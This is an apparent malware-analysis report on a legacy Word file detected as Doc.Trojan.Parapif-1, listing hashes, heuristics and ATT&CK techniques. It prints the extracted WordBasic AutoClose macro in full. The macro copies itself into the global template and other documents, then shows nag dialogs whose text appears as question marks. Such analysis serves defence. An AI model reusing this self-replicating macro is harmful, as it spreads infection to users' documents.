Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a24f50d6f16d2852…

MALICIOUS

Office (OLE)

Size: 30.5 KB
Created: 2001-12-08 05:35:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 7e60b7c59e4627386e1eac95627c0847
SHA-1: 0535446a0e2addac45b98e3e9e2f6373a18fc109
SHA-256: a24f50d6f16d285245c429013b38a6ff51aa84dcae7280f81d0ff4e4032e7c6f
Risk Score: 140

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing a WordBasic AutoClose macro, identified by heuristics and the ClamAV signature Doc.Trojan.Parapif-1. The AutoClose macro is designed to execute automatically when the document is closed, indicating an attempt to run malicious code. This macro likely serves as an initial execution vector for a secondary payload, consistent with spearphishing attachment tactics.

Heuristics 4

  • ClamAV: Doc.Trojan.Parapif-1 (critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Parapif-1
  • VBA macros detected (medium; OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • Auto_Close macro (high; OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3101 bytes
SHA-256: 30f7be020460143e91a13e04c48b6c789638f65626174bff447b9118108380c4
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoClose"

Public Sub MAIN()
Dim IQ
Dim aa
Dim s
Dim a$
Dim am$
Dim IQ1
Dim aaa
Dim ss
Dim R
Dim A_
On Error Resume Next
WordBasic.DisableInput 1

IQ = WordBasic.CountMacros(0)
If IQ > 0 Then
For aa = 1 To IQ
If WordBasic.[MacroName$](aa, 0) = "AutoClose" Then
s = 1
End If
Next aa
End If

a$ = WordBasic.[FileName$]()
am$ = a$ + ":AutoClose"
If s <> 1 Then
WordBasic.MacroCopy am$, "AutoClose", -1
End If

IQ1 = WordBasic.CountMacros(1)
If IQ1 > 0 Then
For aaa = 1 To IQ1
If WordBasic.[MacroName$](aaa, 1) = "AutoClose" Then
ss = 1
End If
Next aaa
End If

If ss <> 1 Then
WordBasic.FileSaveAs Format:=1
WordBasic.MacroCopy "AutoClose", am$, -1
End If

R = 1
WordBasic.BeginDialog 396, 266, "? ? ? ? ? ? ? ?"
    WordBasic.PushButton 7, 139, 88, 21, "????", "Push1"
    WordBasic.PushButton 8, 167, 88, 21, "????", "Push2"
    WordBasic.PushButton 8, 197, 88, 21, "????", "Push3"
    WordBasic.PushButton 8, 228, 88, 21, "????", "Push4"
    WordBasic.Text 15, 7, 330, 13, "???????????????????!!", "Text1"
    WordBasic.Text 15, 26, 328, 13, "???????????,??????,???", "Text2"
    WordBasic.Text 15, 45, 334, 13, "?,???????????!!????????", "Text4"
    WordBasic.Text 15, 64, 194, 13, "????,?????!!!!!!", "Text5"
    WordBasic.Text 15, 83, 336, 13, "??????????,??????????", "Text7"
    WordBasic.Text 15, 102, 330, 13, "??????????!!??????????", "Text8"
    WordBasic.Text 15, 121, 312, 13, "???????..................................................", "Text9"
    WordBasic.Text 110, 143, 256, 13, "????????????????", "Text10"
    WordBasic.Text 111, 172, 256, 13, "????????????????", "Text11"
    WordBasic.Text 110, 201, 256, 13, "????????????????", "Text12"
    WordBasic.Text 109, 232, 224, 13, "??????????????", "Text13"
WordBasic.EndDialog

QQQ:
WordBasic.Beep
Dim pig As Object: Set pig = WordBasic.CurValues.UserDialog
A_ = WordBasic.Dialog.UserDialog(pig)
If A_ = 1 Then
WordBasic.Beep
WordBasic.MsgBox "??Trend??????????pc-cillin97???????????!???????????,????!", "????????,????,??????", 16
End If
If A_ = 2 Then
WordBasic.Beep
WordBasic.MsgBox "?????????????????????GGreat???????,??????????????????????!", "????????,????,??????", 16

End If
If A_ = 3 Then
WordBasic.Beep
WordBasic.MsgBox "???????????,?????????,???????????,?????????????! ? ! ???!!???!!", "????????,????,??????", 16
End If
If A_ = 4 Then
WordBasic.Beep
WordBasic.MsgBox "????????????????,??????,????????????,???????????golf??!!", "????????,????,??????", 16
End If
R = R + 1
If R <= 4 Then GoTo QQQ

WordBasic.FileNewDefault
WordBasic.CenterPara
WordBasic.FormatFont Points:=40, Underline:=1, Color:=2, Bold:=1
WordBasic.Insert "????????,???????,????????,sorry!!???shift?,??? ?? / ???? ??!!"
exit_:
End Sub